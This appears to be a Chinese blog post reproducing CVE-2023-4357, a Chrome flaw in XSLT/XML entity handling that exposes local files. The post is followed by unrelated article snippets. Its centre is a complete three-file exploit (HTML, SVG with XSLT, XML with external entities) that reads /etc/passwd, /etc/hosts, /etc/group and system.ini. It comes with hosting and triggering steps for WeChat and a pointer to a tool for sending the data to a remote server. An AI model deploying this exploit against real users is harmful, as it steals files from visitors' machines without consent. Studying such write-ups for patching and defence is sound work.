谷歌浏览器任意文件访问漏洞(CVE-2023-4357)复现

news/2024/4/25 18:04:36

1.漏洞级别

高危

2.漏洞描述

该漏洞的存在是由于 Google Chrome中未充分验证 XML 中不受信任的输入。远程攻击者可利用该漏洞通过构建的 HTML 页面绕过文件访问限制,导致chrome任意文件读取。
总结:一个XXE漏洞

3.利用范围

Google Chrome < 116.0.5845.96
所有使用谷歌内核的浏览器都能触发该漏洞 因此这个漏洞的利用范围其实非常广泛
在复现的时候 对微信浏览器的复现依然可以成功

4.漏洞复现

4.1 漏洞代码

我们需要创建三个文件
c.html


<body><div id="r"></div><script>const ifr = document.createElement('iframe');ifr.style.display = 'none';document.body.appendChild(ifr);ifr.onload = function() {const ifrContent = ifr.contentWindow.document.documentElement.innerHTML;r.innerHTML = `current url:<br />${location.href}<br /><br />get data:<br />${ifrContent}`;}ifr.src = "./c2.svg";var data = `current url:<br />${location.href}<br /><br />get data:<br />${ifrContent}`;alert(data);
</script>
</body>

c2.svg


<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><svg width="1000%" height="1000%" version="1.1" xmlns="http://www.w3.org/2000/svg"><foreignObject class="node" font-size="18" width="100%" height="100%"><body xmlns="http://www.w3.org/1999/xhtml"><xmp><xsl:copy-of select="document('./c3.xml')"/></xmp></body></foreignObject></svg></xsl:template>
</xsl:stylesheet>

c3.xml


<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xml" href="?#"?>
<!DOCTYPE p [<!ENTITY passwd SYSTEM "file:///etc/passwd"><!ENTITY hosts SYSTEM "file:///etc/hosts"><!ENTITY group SYSTEM "file://localhost/etc/group"><!ENTITY sysini SYSTEM "file:///c:/windows/system.ini">
]>
<p><p style="border-style: dotted;">/etc/passwd:&passwd;</p><p style="border-style: dotted;" id="hosts">/etc/hosts:&hosts;</p><p style="border-style: dotted;">/etc/group:&group;</p><p style="border-style: dotted;">c:/windows/system.ini:&sysini;</p>
</p>

注:

xml文件是我们控制输出内容的,写法可以直接参考xml引用外部主体的方法,这里需要注意的是必须要写绝对路径

创建好这3个文件后,上传到服务器部署,没有web环境的童鞋可以通过python快速拉起一个

python3 http.server 8080   #python3

简单复现,在微信电脑端直接搜索生成的网页链接,
在这里插入图片描述点击访问,如果处于漏洞内核版本下就会成功触发
在这里插入图片描述

4.2 漏洞利用进阶

这里的敏感数据显示都是存在于网页上,但是我们依然可以通过html的机制把这些敏感数据外发到指定服务器上

可以参考这个项目

https://github.com/idootop/all-seeing-eye/tree/main

后续有时间我就写一个简易的实现代码,如果想直接测试 可以用上面的项目


https://www.xjx100.cn/news/3092469.html

相关文章

【Python爬虫】8大模块md文档集合从0到scrapy高手,第7篇:selenium 数据提取详解

本文主要学习一下关于爬虫的相关前置知识和一些理论性的知识&#xff0c;通过本文我们能够知道什么是爬虫&#xff0c;都有那些分类&#xff0c;爬虫能干什么等&#xff0c;同时还会站在爬虫的角度复习一下http协议。 爬虫全套笔记地址&#xff1a; 请移步这里 共 8 章&#x…

linux篇---修改图片权限

linux篇—修改图片权限 find . -name "*.jpg" | xargs chmod rfind . -name "*.jpg" | xargs sudo chmod -x find . -name "*.jpg" | xargs ls -l

郎酒“掉队”,经销商们能等来春天吗?

文 | 螳螂观察&#xff08;TanglangFin&#xff09; 作者 | 渡过 有“六朵金花”之称的川酒品牌中&#xff0c;五粮液、泸州老窖、舍得、水井坊都已成功上市&#xff0c;只剩下郎酒和剑南春未上市。 与IPO的“掉队”相对应的&#xff0c;是郎酒在冲刺高端、内部管理、渠道管…

预计2023年交付35万台,增速超400%!HUD硬核玩家强势崛起

随着HUD市场渗透率加速提升&#xff0c;其高速增长期已经来临。 W-HUD和AR-HUD在中国市场的萌芽导入期是在2020年前后&#xff0c;此前HUD市场不温不火&#xff0c;主要归因于以往W-HUD FOV较小&#xff0c;成像画面有限&#xff0c;显示内容简单且效果粗糙&#xff1b;而AR-H…

vivado产生报告阅读分析13-时序报告9

1、Report Exceptions 在综合后的流程中可随时使用“ Report Exceptions ” &#xff08; 例外报告 &#xff09; 命令。“ Report Exception ”命令用于报告以下信息&#xff1a; • 在设计中已置位并且影响时序分析的所有时序例外 • 在设计中已置位但由于被其他时序例外覆…

Mrakdown Nice:格式

标题 缩进 删除线 斜体 加粗

javascript开发经验小结

javascript 面向对象的编程方法 对象声明&#xff1a; 1。 var MapX {}; 2。 var XLngLat new Class(); 3.//菜单项对象。 function MenuItem(id,text,clickEvent,accelerator) //指定菜单项属性&#xff0c;ID&#xff0c;中文名&#xff0c;单击事件快捷键…

Golang基础-面向对象篇

文章目录 struct结构体类的表示与封装类的继承多态的基本要素与实现interface空接口反射变量的内置pairreflect包解析Struct TagStruct Tag在json中的应用 struct结构体 在Go语言中&#xff0c;可以使用type 关键字来创建自定义类型&#xff0c;这对于提高代码的可读性和可维护…